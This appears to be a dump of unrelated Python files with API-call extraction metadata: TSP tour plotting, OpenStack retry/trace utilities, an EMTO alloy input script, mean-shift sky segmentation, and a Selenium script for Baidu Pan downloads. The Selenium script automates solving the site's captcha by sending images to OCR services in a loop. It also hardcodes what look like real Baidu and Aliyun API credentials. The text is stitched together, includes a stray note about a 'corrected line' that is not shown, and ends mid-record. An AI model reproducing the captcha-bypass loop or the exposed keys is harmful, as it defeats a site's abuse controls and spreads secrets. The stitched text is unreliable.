opt_tour = self.optimum.tour
xt = []
yt = []
for p in opt_tour:
coords = self.problem.node_coords[p]
xt.append(coords[0])
yt.append(coords[1])
xt.append(xt[0])
yt.append(yt[0])
ax1.plot(xt, yt, alpha=0.4, color="C4", linewidth=5, zorder=1)
# Labels
redline = mlines.Line2D(
[], [], color="C1", linestyle="dashed", label="Overall Best Tour"
)
yellowline = mlines.Line2D(
[], [], color="C4", linewidth="5", label="Known Optimal Tour"
)
grey_dot = mlines.Line2D(
[], [], color="dimgrey", marker="o", linestyle="", label="City"
)
ax1.legend(
handles=[redline, yellowline, grey_dot],
loc="upper center",
bbox_to_anchor=(0.5, -0.1),
shadow=True,
ncol=1,
)
fig.tight_layout(rect=[0, 0, 1, 1])
# Saving to specific directory and file
out_path = "output/{}".format(self.output_path)
Path(out_path).mkdir(parents=True, exist_ok=True)
plt.savefig("{}/best_{}.png".format(out_path, self.iteration), format="png")
plt.savefig("{}/best_{}.pgf".format(out_path, self.iteration), format="pgf")
plt.close(fig)
def print_stats_only(self):
# make figure, axes
plt.style.use("ggplot")
plt.tight_layout()
gs_kw = dict(width_ratios=[1], height_ratios=[1])
fig, (ax2) = plt.subplots(figsize=(9, 4.5), ncols=1, nrows=1, gridspec_kw=gs_kw)
ax2.set(title="Quality development", xlabel="iteration", ylabel="tour length")
ymax = max(max(self.quality_overall), max(self.quality_by_iteration))
if self.optimum is not None:
ymin = self.optimum.weight
else:
ymin = min(min(self.quality_overall), min(self.quality_by_iteration))
margin = (ymax - ymin) * 0.5
ax2.set(
xlim=(-0.5, self.max_iterations + 0.5), ylim=(ymin - margin, ymax + margin)
)
iterations = list(range(0, self.iteration + 1))
ax2.plot(iterations, self.quality_by_iteration, marker="", color="red")
ax2.plot(iterations, self.quality_overall, marker="", color="grey")
if self.optimum is not None:
ax2.axhline(y=self.optimum.weight, color="yellowgreen", linewidth=2)
# Legend
red_dot = mlines.Line2D([], [], color="red", marker="", label="Iteration best")
grey_dot = mlines.Line2D([], [], color="grey", marker="", label="Overall best")
ax2_handles = [red_dot, grey_dot]
if self.optimum is not None:
baseline = mlines.Line2D(
[], [], color="yellowgreen", linewidth=2, label="Known Optimum"
)
ax2_handles.append(baseline)
ax2.legend(handles=ax2_handles, loc="upper right", shadow=True)
# Saving to specific directory and file
out_path = "output/{}".format(self.output_path)
Path(out_path).mkdir(parents=True, exist_ok=True)
plt.savefig("{}/stats.png".format(out_path), format="png")
plt.savefig("{}/stats.pgf".format(out_path), format="pgf")
plt.close(fig)
def print_state(self, population):
"""
        Print the state of the optimisation, with a coordinate-system plot of tours and stats.
        By default only the latest addition to the memory is plotted;
        a population, given as a list of tours, is additionally plotted if provided.
"""
# make figure, axes
# plt.style.use('seaborn-whitegrid')
plt.style.use("ggplot")
gs_kw = dict(width_ratios=[3, 2], height_ratios=[1])
fig, (ax1, ax2) = plt.subplots(
figsize=(9, 4.5), ncols=2, nrows=1, gridspec_kw=gs_kw
)
plt.tight_layout()
ax1.set(title="Optimisation State", xlabel="x", ylabel="y")
ax1.set_aspect("equal")
ax2.set(title="Quality development", xlabel="iteration", ylabel="tour length")
# AX1 - Coordinate System
# Nodes
xs, ys = zip(*self.problem.node_coords.values())
labels = self.problem.node_coords.keys()
ax1.scatter(xs, ys, marker="o", color="dimgrey", zorder=10)
for label, x, y in zip(labels, xs, ys):
ax1.annotate(label, xy=(x, y), zorder=20)
# Tours (in current population)
        for agent in population:
            xt = []
            yt = []
            for p in agent.tour:
                coords = self.problem.node_coords[p]
                xt.append(coords[0])
                yt.append(coords[1])
            xt.append(xt[0])
            yt.append(yt[0])
            ax1.plot(xt, yt, alpha=0.1, color="goldenrod", linewidth=5)
# Best Tour in Population
best_agent = self.memory[self.iteration]
best_tour = best_agent.tour
xt = []
yt = []
for p in best_tour:
coords = self.problem.node_coords[p]
xt.append(coords[0])
yt.append(coords[1])
xt.append(xt[0])
yt.append(yt[0])
ax1.plot(xt, yt, alpha=1.0, color="darkred", linestyle="dashed")
# LABELS
redline = mlines.Line2D(
[], [], color="darkred", linestyle="dashed", label="Best Tour in Iteration"
)
yellowline = mlines.Line2D(
[], [], color="goldenrod", linewidth="5", label="Other Tours in Iteration"
)
grey_dot = mlines.Line2D(
[], [], color="dimgrey", marker="o", linestyle="", label="Node"
)
ax1.legend(
handles=[grey_dot, yellowline, redline],
loc="upper center",
bbox_to_anchor=(0.5, -0.1),
shadow=True,
ncol=3,
)
# AX2 - Stats
ax2.set(xlim=(0 - 0.5, self.max_iterations + 0.5))
iterations = list(range(0, self.iteration + 1))
ax2.plot(
iterations, self.quality_by_iteration, marker="o", color="red", linestyle=""
)
ax2.plot(
iterations, self.quality_overall, marker="x", color="grey", linestyle=""
)
# LABELS
red_dot = mlines.Line2D(
[], [], color="red", marker="o", label="Iteration best", linestyle=""
)
grey_dot = mlines.Line2D(
[], [], color="grey", marker="x", label="Overall best", linestyle=""
)
ax2.legend(
handles=[red_dot, grey_dot],
loc="upper center",
bbox_to_anchor=(0.5, -0.1),
shadow=True,
ncol=2,
)
fig.tight_layout()
# Saving to specific directory and file
out_path = "output/{}".format(self.output_path)
Path(out_path).mkdir(parents=True, exist_ok=True)
plt.savefig(
"{}/iteration_{:03d}.png".format(out_path, self.iteration), format="png"
)
plt.savefig(
"{}/iteration_{:03d}.pgf".format(out_path, self.iteration), format="pgf"
)
plt.close(fig)
apis:
[
    "matplotlib.lines.Line2D",
    "matplotlib.pyplot.close",
    "matplotlib.rcParams.update",
    "tsplib95.load",
    "matplotlib.pyplot.subplots",
    "numpy.random.default_rng",
    "candidate_solution.CandidateSolution.set_problem",
    "matplotlib.pyplot.style.use",
    "matplotlib.use",
    "pathlib.Path",
    "matplotlib.pyplot.tight_layout"
]
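Note that the min() in get_heuristic_tour must compare by distance rather than by the (node, distance) tuple itself, hence the key= argument in the corrected line above. A self-contained sketch of the same nearest-neighbour construction on a toy instance (the coordinates are made up, not from tsplib95):

# Standalone sketch of the nearest-neighbour tour construction used in get_heuristic_tour.
coords = {1: (0, 0), 2: (5, 0), 3: (1, 1), 4: (4, 4)}  # toy instance

def d(a, b):
    (xa, ya), (xb, yb) = coords[a], coords[b]
    return ((xa - xb) ** 2 + (ya - yb) ** 2) ** 0.5

nodes = list(coords)
tour = [nodes.pop(0)]
while nodes:
    # pick the city nearest to the tour's current end; key= compares distances only
    nearest = min(nodes, key=lambda node: d(tour[-1], node))
    tour.append(nearest)
    nodes.remove(nearest)
print(tour)  # [1, 3, 2, 4]
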
# coding=utf-8
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from aip import AipOcr
import requests
import base64
import urllib.request
import urllib
import os
import pytesseract
from PIL import Image
client = AipOcr('18671664', 'O0d2Tgv4imtAfVqhQF49py0o', 'au1xuxZlqqROnOjlVqLCfHhO4lLQZICl')
import json
import time
import pickle
import urllib.parse
import re
# import nal
# print(html)
# exit('zss')
# enable performance log recording
# chrome_options = Options()
def save_cookies(requests_cookiejar, filename):
with open(filename, 'wb') as f:
pickle.dump(requests_cookiejar, f, 0)
url = 'https://pan.baidu.com/s/1n890K1uMotIasOIwEQ5neQ'
tqm = '4cau'
tqmCssId = 'ktlJmA'
clickName = 'ivirlGXq'
cookies_file = 'baidu.cookies'
urlArr = url.rsplit('/', 1)
downloadUrl = '/Users/zhongsheng/PycharmProjects/baidu2/' + urlArr[1]
print(downloadUrl)
# exit()
chromeOptions = webdriver.ChromeOptions()
prefs = {"download.default_directory": downloadUrl}
chromeOptions.add_experimental_option("prefs", prefs)
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=chromeOptions)
# driver = webdriver.Chrome(executable_path="C:\python\chromedriver.exe", chrome_options=chrome_options,
# desired_capabilities=caps)
# driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=chrome_options, desired_capabilities=caps)
# driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())
# driver = webdriver.Firefox(executable_path='/Users/zhongsheng/test/geckodriver')
# driver = webdriver.Firefox()
driver.get(url)
cookies = pickle.load(open(cookies_file, "rb"))
for cookie in cookies:
# print(cookie)
if 'expiry' in cookie:
del cookie['expiry']
driver.add_cookie(cookie)
# driver.refresh()
# time.sleep(4)
driver.get(url)
# info = driver.find_element_by_xpath("//a[@node-type='header-login-btn']").text
# print(info);
# if info == '登录':
# elem = driver.find_element_by_id(tqmCssId)
# elem.send_keys(tqm)
# element = driver.find_element_by_id(clickName)
# driver.execute_script("arguments[0].click();", element)
# Download page
time.sleep(5)
driver.find_element_by_xpath("//a[@data-button-id='b3']").click()
# # print(jsonCookies)
# with open(cookies_file, 'w') as f:
# f.write(jsonCookies)
# save_cookies(cookies, cookies_file)
# Link: https://pan.baidu.com/s/1lgSXM9s1XwLVtI3PTTKJSg  extraction code: j5pj
# After the JS click event fires the request, the browser pops up the download dialog; grab the log records
time.sleep(5)
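# Captcha handling: fetch the code image, OCR it via the Alibaba Cloud verify-code API, then submit the result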
for a in range(100):
time.sleep(2)
img = driver.find_element_by_xpath("//img[@class='img-code']").get_attribute('src')
urllib.request.urlretrieve(img, '23.jpeg')
# exit('aa')
time.sleep(2)
# encodestr = nal.getImg('23.jpeg')
# dict = {'img': encodestr}
# yzm = nal.getYzm(dict)
# print(yzm)
# API product path
host = 'https://codevirify.market.alicloudapi.com'
path = '/icredit_ai_image/verify_code/v1'
# Alibaba Cloud (Aliyun) APPCODE
appcode = '712d406485a44077a7e72d7b03a2af36'
bodys = {}
url = host + path
# Content data type: 0 means BASE64-encoded image data; 1 means an image file URL
# Recognize using BASE64 encoding:
# (the content data type here is BASE64)
# f = open(r'23.jpeg', 'rb')
# contents = base64.b64encode(f.read())
# f.close()
with open('23.jpeg', 'rb') as f:  # read the local image in binary mode
data = f.read()
contents = str(base64.b64encode(data), 'utf-8')
bodys['IMAGE'] = contents
bodys['IMAGE_TYPE'] = '0'
# To recognize via a URL instead (content data type 1 = image file URL):
# bodys['IMAGE'] = '<image URL>'
# bodys['IMAGE_TYPE'] = '1'
post_data = urllib.parse.urlencode(bodys).encode('utf-8')
request = urllib.request.Request(url, post_data)
request.add_header('Authorization', 'APPCODE ' + appcode)
request.add_header('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8')
response = urllib.request.urlopen(request)
content = response.read()
yzm = ''
if (content):
print(content.decode('utf-8'))
ss = content.decode("utf8")
print(ss)
ss1 = json.loads(ss)
aa = ss1['VERIFY_CODE_ENTITY']['VERIFY_CODE']
# aa = ss1['prism_wordsInfo'][0]['word']
yzm = re.sub('\s', '', aa)
# print(strs['words_result']['words'])
# driver.find_element_by_xpath("//span[@class='text']").click()
time.sleep(1)
elemYzm = driver.find_element_by_xpath("//input[@class='input-code']")
elemYzm.clear()
elemYzm.send_keys(yzm)
time.sleep(1)
print('############# click')
# driver.find_element_by_xpath("//a[@class='underline']").click()
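# "确定" means "confirm": submit the recognized code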
driver.find_element_by_link_text('确定').click()
print('#############')
time.sleep(2)
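# "换一张" means "get another one": refresh the captcha image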
driver.find_element_by_link_text('换一张').click()
def every_downloads_chrome(driver):
if not driver.current_url.startswith("chrome://downloads"):
driver.execute_script('window.open()')
        # switch to the newly opened tab
        driver.switch_to.window(driver.window_handles[1])
driver.get("chrome://downloads/")
return driver.execute_script("""
var items = downloads.Manager.get().items_;
if (items.every(e => e.state === "COMPLETE"))
return items.map(e => e.file_url);
""")
# waits for all the files to be completed and returns the paths
paths = WebDriverWait(driver, 120, 1).until(every_downloads_chrome)
print(paths)
time.sleep(10)
driver.quit()
exit()
def get_file_content(filePath):
with open(filePath, 'rb') as fp:
return fp.read()
options = {}
options["language_type"] = "CHN_ENG"
options["detect_direction"] = "true"
options["detect_language"] = "true"
options["probability"] = "true"
yzm = ''
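# NOTE: unreachable after the exit() call above; an alternative captcha loop that OCRs with Baidu AipOcr instead of the Alibaba Cloud API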
for a in range(100):
img = driver.find_element_by_xpath("//img[@class='img-code']").get_attribute('src')
urllib.request.urlretrieve(img, '3.jpeg')
# strs = client.basicGeneralUrl(img, options)
image = get_file_content('3.jpeg')
strs = client.basicGeneral(image, options)
print(img)
print(strs)
if strs['words_result']:
yzm = strs['words_result'][0]['words']
print(strs['words_result'][0])
# print(strs['words_result']['words'])
# driver.find_element_by_xpath("//span[@class='text']").click()
time.sleep(1)
elemYzm = driver.find_element_by_xpath("//input[@class='input-code']")
    elemYzm.clear()  # clear the field first; send_keys('') was a no-op
elemYzm.send_keys(yzm)
time.sleep(1)
    print('############# click')
driver.find_element_by_xpath("//a[@class='underline']").click()
    elemYzm.clear()  # likewise, clear rather than send empty keys
print(a)
print('#############')
time.sleep(1)
# browser_log = driver.get_log('performance')
# browser_log.reverse()
# print(browser_log)
# for i in browser_log:
# if i.get('message'):
# message_dict = json.loads(i.get('message'))
# file_download_url = message_dict.get('message').get('params').get('url') if message_dict else None
#
# print(file_download_url)
|
[
"pickle.dump",
"urllib.request.Request",
"json.loads",
"urllib.parse.urlencode",
"aip.AipOcr",
"urllib.request.urlopen",
"time.sleep",
"selenium.webdriver.support.wait.WebDriverWait",
"urllib.request.urlretrieve",
"selenium.webdriver.ChromeOptions",
"webdriver_manager.chrome.ChromeDriverManager",
"base64.b64encode",
"re.sub"
] |
[((446, 532), 'aip.AipOcr', 'AipOcr', (['"""18671664"""', '"""O0d2Tgv4imtAfVqhQF49py0o"""', '"""au1xuxZlqqROnOjlVqLCfHhO4lLQZICl"""'], {}), "('18671664', 'O0d2Tgv4imtAfVqhQF49py0o',\n 'au1xuxZlqqROnOjlVqLCfHhO4lLQZICl')\n", (452, 532), False, 'from aip import AipOcr\n'), ((1113, 1138), 'selenium.webdriver.ChromeOptions', 'webdriver.ChromeOptions', ([], {}), '()\n', (1136, 1138), False, 'from selenium import webdriver\n'), ((2352, 2365), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2362, 2365), False, 'import time\n'), ((2653, 2666), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2663, 2666), False, 'import time\n'), ((5479, 5493), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (5489, 5493), False, 'import time\n'), ((2694, 2707), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (2704, 2707), False, 'import time\n'), ((2800, 2842), 'urllib.request.urlretrieve', 'urllib.request.urlretrieve', (['img', '"""23.jpeg"""'], {}), "(img, '23.jpeg')\n", (2826, 2842), False, 'import urllib\n'), ((2864, 2877), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (2874, 2877), False, 'import time\n'), ((3774, 3812), 'urllib.request.Request', 'urllib.request.Request', (['url', 'post_data'], {}), '(url, post_data)\n', (3796, 3812), False, 'import urllib\n'), ((3981, 4012), 'urllib.request.urlopen', 'urllib.request.urlopen', (['request'], {}), '(request)\n', (4003, 4012), False, 'import urllib\n'), ((4455, 4468), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4465, 4468), False, 'import time\n'), ((4596, 4609), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4606, 4609), False, 'import time\n'), ((4792, 4805), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (4802, 4805), False, 'import time\n'), ((5894, 5935), 'urllib.request.urlretrieve', 'urllib.request.urlretrieve', (['img', '"""3.jpeg"""'], {}), "(img, '3.jpeg')\n", (5920, 5935), False, 'import urllib\n'), ((6341, 6354), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6351, 6354), False, 'import time\n'), ((6488, 6501), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6498, 6501), False, 'import time\n'), ((6670, 6683), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6680, 6683), False, 'import time\n'), ((786, 823), 'pickle.dump', 'pickle.dump', (['requests_cookiejar', 'f', '(0)'], {}), '(requests_cookiejar, f, 0)\n', (797, 823), False, 'import pickle\n'), ((4182, 4196), 'json.loads', 'json.loads', (['ss'], {}), '(ss)\n', (4192, 4196), False, 'import json\n'), ((4314, 4335), 're.sub', 're.sub', (['"""\\\\s"""', '""""""', 'aa'], {}), "('\\\\s', '', aa)\n", (4320, 4335), False, 'import re\n'), ((5405, 5434), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['driver', '(120)', '(1)'], {}), '(driver, 120, 1)\n', (5418, 5434), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((1272, 1293), 'webdriver_manager.chrome.ChromeDriverManager', 'ChromeDriverManager', ([], {}), '()\n', (1291, 1293), False, 'from webdriver_manager.chrome import ChromeDriverManager\n'), ((3497, 3519), 'base64.b64encode', 'base64.b64encode', (['data'], {}), '(data)\n', (3513, 3519), False, 'import base64\n'), ((3714, 3743), 'urllib.parse.urlencode', 'urllib.parse.urlencode', (['bodys'], {}), '(bodys)\n', (3736, 3743), False, 'import urllib\n')]
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Utilities and helper functions."""
import functools
import inspect
import logging as py_logging
import retrying
import six
import time
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import strutils
from os_brick.i18n import _
LOG = logging.getLogger(__name__)
def retry(exceptions, interval=1, retries=3, backoff_rate=2):
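    # Retries the wrapped callable on the given exception classes, sleeping
    # interval * backoff_rate**attempt seconds between tries.
    # Illustrative use: @retry((IOError,), interval=2, retries=5)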
def _retry_on_exception(e):
return isinstance(e, exceptions)
def _backoff_sleep(previous_attempt_number, delay_since_first_attempt_ms):
exp = backoff_rate ** previous_attempt_number
wait_for = max(0, interval * exp)
LOG.debug("Sleeping for %s seconds", wait_for)
return wait_for * 1000.0
def _print_stop(previous_attempt_number, delay_since_first_attempt_ms):
delay_since_first_attempt = delay_since_first_attempt_ms / 1000.0
LOG.debug("Failed attempt %s", previous_attempt_number)
LOG.debug("Have been at this for %s seconds",
delay_since_first_attempt)
return previous_attempt_number == retries
if retries < 1:
raise ValueError(_('Retries must be greater than or '
'equal to 1 (received: %s). ') % retries)
def _decorator(f):
@six.wraps(f)
def _wrapper(*args, **kwargs):
r = retrying.Retrying(retry_on_exception=_retry_on_exception,
wait_func=_backoff_sleep,
stop_func=_print_stop)
return r.call(f, *args, **kwargs)
return _wrapper
return _decorator
def platform_matches(current_platform, connector_platform):
curr_p = current_platform.upper()
conn_p = connector_platform.upper()
if conn_p == 'ALL':
return True
# Add tests against families of platforms
if curr_p == conn_p:
return True
return False
def os_matches(current_os, connector_os):
curr_os = current_os.upper()
conn_os = connector_os.upper()
if conn_os == 'ALL':
return True
# add tests against OSs
if (conn_os == curr_os or
conn_os in curr_os):
return True
return False
def merge_dict(dict1, dict2):
"""Try to safely merge 2 dictionaries."""
if type(dict1) is not dict:
raise Exception("dict1 is not a dictionary")
if type(dict2) is not dict:
raise Exception("dict2 is not a dictionary")
dict3 = dict1.copy()
dict3.update(dict2)
return dict3
def trace(f):
"""Trace calls to the decorated function.
    This decorator should always be applied as the outermost decorator, so
    that it wraps all of the others and does not interfere with their
    behavior.
Using this decorator on a function will cause its execution to be logged at
`DEBUG` level with arguments, return values, and exceptions.
:returns: a function decorator
"""
func_name = f.__name__
@functools.wraps(f)
def trace_logging_wrapper(*args, **kwargs):
if len(args) > 0:
maybe_self = args[0]
else:
maybe_self = kwargs.get('self', None)
if maybe_self and hasattr(maybe_self, '__module__'):
logger = logging.getLogger(maybe_self.__module__)
else:
logger = LOG
# NOTE(ameade): Don't bother going any further if DEBUG log level
# is not enabled for the logger.
if not logger.isEnabledFor(py_logging.DEBUG):
return f(*args, **kwargs)
all_args = inspect.getcallargs(f, *args, **kwargs)
logger.debug('==> %(func)s: call %(all_args)r',
{'func': func_name,
# NOTE(mriedem): We have to stringify the dict first
# and don't use mask_dict_password because it results in
# an infinite recursion failure.
'all_args': strutils.mask_password(
six.text_type(all_args))})
start_time = time.time() * 1000
try:
result = f(*args, **kwargs)
except Exception as exc:
total_time = int(round(time.time() * 1000)) - start_time
logger.debug('<== %(func)s: exception (%(time)dms) %(exc)r',
{'func': func_name,
'time': total_time,
'exc': exc})
raise
total_time = int(round(time.time() * 1000)) - start_time
if isinstance(result, dict):
mask_result = strutils.mask_dict_password(result)
elif isinstance(result, six.string_types):
mask_result = strutils.mask_password(result)
else:
mask_result = result
logger.debug('<== %(func)s: return (%(time)dms) %(result)r',
{'func': func_name,
'time': total_time,
'result': mask_result})
return result
return trace_logging_wrapper
def convert_str(text):
"""Convert to native string.
Convert bytes and Unicode strings to native strings:
* convert to bytes on Python 2:
encode Unicode using encodeutils.safe_encode()
* convert to Unicode on Python 3: decode bytes from UTF-8
"""
if six.PY2:
return encodeutils.to_utf8(text)
else:
if isinstance(text, bytes):
return text.decode('utf-8')
else:
return text
|
[
"oslo_log.log.getLogger",
"oslo_utils.strutils.mask_password",
"oslo_utils.strutils.mask_dict_password",
"inspect.getcallargs",
"retrying.Retrying",
"os_brick.i18n._",
"time.time",
"six.text_type",
"oslo_utils.encodeutils.to_utf8",
"functools.wraps",
"six.wraps"
] |
[((854, 881), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (871, 881), True, 'from oslo_log import log as logging\n'), ((3515, 3533), 'functools.wraps', 'functools.wraps', (['f'], {}), '(f)\n', (3530, 3533), False, 'import functools\n'), ((1832, 1844), 'six.wraps', 'six.wraps', (['f'], {}), '(f)\n', (1841, 1844), False, 'import six\n'), ((4096, 4135), 'inspect.getcallargs', 'inspect.getcallargs', (['f', '*args'], {}), '(f, *args, **kwargs)\n', (4115, 4135), False, 'import inspect\n'), ((5851, 5876), 'oslo_utils.encodeutils.to_utf8', 'encodeutils.to_utf8', (['text'], {}), '(text)\n', (5870, 5876), False, 'from oslo_utils import encodeutils\n'), ((1900, 2011), 'retrying.Retrying', 'retrying.Retrying', ([], {'retry_on_exception': '_retry_on_exception', 'wait_func': '_backoff_sleep', 'stop_func': '_print_stop'}), '(retry_on_exception=_retry_on_exception, wait_func=\n _backoff_sleep, stop_func=_print_stop)\n', (1917, 2011), False, 'import retrying\n'), ((3788, 3828), 'oslo_log.log.getLogger', 'logging.getLogger', (['maybe_self.__module__'], {}), '(maybe_self.__module__)\n', (3805, 3828), True, 'from oslo_log import log as logging\n'), ((4575, 4586), 'time.time', 'time.time', ([], {}), '()\n', (4584, 4586), False, 'import time\n'), ((5099, 5134), 'oslo_utils.strutils.mask_dict_password', 'strutils.mask_dict_password', (['result'], {}), '(result)\n', (5126, 5134), False, 'from oslo_utils import strutils\n'), ((1694, 1758), 'os_brick.i18n._', '_', (['"""Retries must be greater than or equal to 1 (received: %s). """'], {}), "('Retries must be greater than or equal to 1 (received: %s). ')\n", (1695, 1758), False, 'from os_brick.i18n import _\n'), ((5212, 5242), 'oslo_utils.strutils.mask_password', 'strutils.mask_password', (['result'], {}), '(result)\n', (5234, 5242), False, 'from oslo_utils import strutils\n'), ((4526, 4549), 'six.text_type', 'six.text_type', (['all_args'], {}), '(all_args)\n', (4539, 4549), False, 'import six\n'), ((5001, 5012), 'time.time', 'time.time', ([], {}), '()\n', (5010, 5012), False, 'import time\n'), ((4715, 4726), 'time.time', 'time.time', ([], {}), '()\n', (4724, 4726), False, 'import time\n')]
|
from emto_input_generator import *
import os  # needed for os.getcwd() below, unless the star import re-exports os
import numpy as np
folder = os.getcwd() # Get current working directory.
emtopath = folder+"/L11_CuPt" # Folder where the calculations will be performed.
latpath = emtopath
# L11 CuPt
prims = np.array([[1.0,0.5,0.5],
[0.5,1.0,0.5],
[0.5,0.5,1.0]])
basis = np.array([[0.0,0.0,0.0],
[0.5,0.5,0.5]])
species = ["Cu","Pt"]
species_cpa = [["cu","pt"],["cu","pt"]]
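# Components for the coherent potential approximation (CPA): each basis site presumably hosts a random Cu/Pt mixture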
input_creator = EMTO(folder=emtopath)
input_creator.init_structure(latpath=latpath,
prims=prims,
basis=basis,
species=species,
latname='L11')
input_creator.init_bulk(atoms_cpa=species_cpa)
sws_range = np.linspace(2,3,6)
#input_creator.write_bmdl_kstr_shape_input()
#input_creator.write_kgrn_kfcd_input()
input_creator.write_kgrn_kfcd_swsrange(sws=sws_range)
#input_creator.draw_structure('standard_conv')
|
[
"numpy.array",
"numpy.linspace"
] |
[((240, 301), 'numpy.array', 'np.array', (['[[1.0, 0.5, 0.5], [0.5, 1.0, 0.5], [0.5, 0.5, 1.0]]'], {}), '([[1.0, 0.5, 0.5], [0.5, 1.0, 0.5], [0.5, 0.5, 1.0]])\n', (248, 301), True, 'import numpy as np\n'), ((343, 387), 'numpy.array', 'np.array', (['[[0.0, 0.0, 0.0], [0.5, 0.5, 0.5]]'], {}), '([[0.0, 0.0, 0.0], [0.5, 0.5, 0.5]])\n', (351, 387), True, 'import numpy as np\n'), ((786, 806), 'numpy.linspace', 'np.linspace', (['(2)', '(3)', '(6)'], {}), '(2, 3, 6)\n', (797, 806), True, 'import numpy as np\n')]
|
import numpy as np
import cv2
import math
from PIL import Image, ImageStat
import sys
from os import listdir
import pymeanshift as pms
import os.path
# path1 = "/Users/caijieyang/Desktop/allgoodthinghere/"
# files= listdir(path1)
avg_recall=[]
avg_pre=[]
hsl_acc_list=[]
manual_acc_list=[]
file = sys.argv[1]
file = str(file)
# print (file)
origin = Image.open(file)
width, height = origin.size
area = (0, 0, width, 0.5*height)
image = origin.crop(area) # crop top half of the image
image.save(file+"_cropped.png")
original_image = cv2.imread(file+"_cropped.png")
(segmented_image, label_image, number_regions) = pms.segment(original_image, spatial_radius=7,
range_radius=8, min_density=300)
counterclass_all={}
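# Count how many pixels carry each mean-shift segment label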
for j in range(0,len(label_image[0])):
for i in range(0,len(label_image)):
if label_image[i,j] in counterclass_all:
counterclass_all[label_image[i,j]] +=1
else:
counterclass_all[label_image[i,j]] = 1
max_count = 0
for i in counterclass_all:
    if counterclass_all[i] > max_count:
        max_count = counterclass_all[i]
        most_common_colour = i
origin=cv2.imread(file)
data = np.asarray(origin,dtype="int32")
RED = 2
GREEN = 1
BLUE = 0
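# Paint every pixel of the largest segment (assumed to be sky) pure blue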
for i in range (len(original_image)):
for j in range (len(original_image[0])):
if label_image[i][j] == most_common_colour:
data[i, j, GREEN] = 0
data[i, j, RED] = 0
data[i, j, BLUE] = 255
else:
continue
result = Image.fromarray(data.astype(np.uint8))
b, g, r = result.split()
result = Image.merge("RGB", (r, g, b))
result.save(file+"ms_sky_mark.png")
ms = Image.fromarray(segmented_image)
b, g, r = ms.split()
im = Image.merge("RGB", (r, g, b))
im.save(file+"ms_cluster_mark.png")
tempfile = file.replace('.png',' - Copy.png')
if os.path.isfile(tempfile):
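    # The " - Copy" file is the manually marked ground truth; in cv2's BGR order,
    # a pixel with channel 0 == 255 and the others 0 was marked pure blue (sky)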
marked_pixel_values = cv2.imread(tempfile)
true_po_list=[]
precision_list=[]
true_sky_counter=0
true_positive_counter=0
false_positive_counter=0
# print (marked_pixel_values[0,0])
# print (int(len(marked_pixel_values)/2+1))
for i in range(int(len(marked_pixel_values)/2+1)):
for j in range(len(marked_pixel_values[0])):
if marked_pixel_values[i][j][0] == 255 and marked_pixel_values[i][j][1] == 0 and marked_pixel_values[i][j][2] == 0 :
true_sky_counter+=1
if data[i][j][0] == 255 and data[i][j][1] == 0 and data[i][j][2] == 0:
true_positive_counter+=1
else:
if data[i][j][0] == 255 and data[i][j][1] == 0 and data[i][j][2] == 0:
false_positive_counter+=1
avg_recall.append(true_positive_counter/true_sky_counter)
avg_pre.append(true_positive_counter/(true_positive_counter+false_positive_counter))
hsl_acc_list.append((true_positive_counter+false_positive_counter)/((len(marked_pixel_values)/2+1)*len(marked_pixel_values[0])))
manual_acc_list.append(true_sky_counter/((len(marked_pixel_values)/2+1)*len(marked_pixel_values[0])))
print ("meanshift program marked proportion:", (true_positive_counter+false_positive_counter)/((len(marked_pixel_values)/2+1)*len(marked_pixel_values[0])))
print ("manually marked proportion:",true_sky_counter/((len(marked_pixel_values)/2+1)*len(marked_pixel_values[0])))
# print ("recall: ", avg_recall)
# print ("precision: " , avg_pre)
# print ("recall: ", np.mean(avg_recall))
# print ("precision: " , np.mean(avg_pre))
# print (hsl_acc_list)
# print (manual_acc_list)
|
[
"numpy.asarray",
"PIL.Image.open",
"pymeanshift.segment",
"cv2.imread",
"PIL.Image.fromarray",
"PIL.Image.merge"
] |
[((351, 367), 'PIL.Image.open', 'Image.open', (['file'], {}), '(file)\n', (361, 367), False, 'from PIL import Image, ImageStat\n'), ((534, 567), 'cv2.imread', 'cv2.imread', (["(file + '_cropped.png')"], {}), "(file + '_cropped.png')\n", (544, 567), False, 'import cv2\n'), ((616, 694), 'pymeanshift.segment', 'pms.segment', (['original_image'], {'spatial_radius': '(7)', 'range_radius': '(8)', 'min_density': '(300)'}), '(original_image, spatial_radius=7, range_radius=8, min_density=300)\n', (627, 694), True, 'import pymeanshift as pms\n'), ((1143, 1159), 'cv2.imread', 'cv2.imread', (['file'], {}), '(file)\n', (1153, 1159), False, 'import cv2\n'), ((1168, 1201), 'numpy.asarray', 'np.asarray', (['origin'], {'dtype': '"""int32"""'}), "(origin, dtype='int32')\n", (1178, 1201), True, 'import numpy as np\n'), ((1548, 1577), 'PIL.Image.merge', 'Image.merge', (['"""RGB"""', '(r, g, b)'], {}), "('RGB', (r, g, b))\n", (1559, 1577), False, 'from PIL import Image, ImageStat\n'), 